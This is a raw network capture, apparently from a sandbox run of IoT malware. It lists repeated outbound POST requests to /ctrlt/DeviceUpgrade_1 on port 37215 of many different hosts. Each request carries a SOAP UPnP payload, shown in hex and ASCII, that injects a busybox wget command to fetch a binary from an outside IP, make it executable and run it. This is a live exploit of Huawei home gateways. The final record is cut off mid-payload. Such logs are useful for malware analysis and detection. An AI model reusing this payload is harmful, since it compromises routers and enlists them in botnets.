                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            501192.168.2.155514841.37.24.4137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.787122965 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            502192.168.2.155130241.114.148.20737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.787173986 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            503192.168.2.154295441.139.50.14837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.787173986 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            504192.168.2.154089241.229.85.11737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.787199974 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            505192.168.2.155488241.176.180.22737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.787214041 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            506192.168.2.154849041.171.25.21437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.787245989 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            507192.168.2.155836041.207.211.16137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.787280083 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            508192.168.2.154671441.110.2.18537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.787297964 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            509192.168.2.154530241.117.246.12437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.787319899 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            510192.168.2.155073841.126.225.25337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.787357092 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 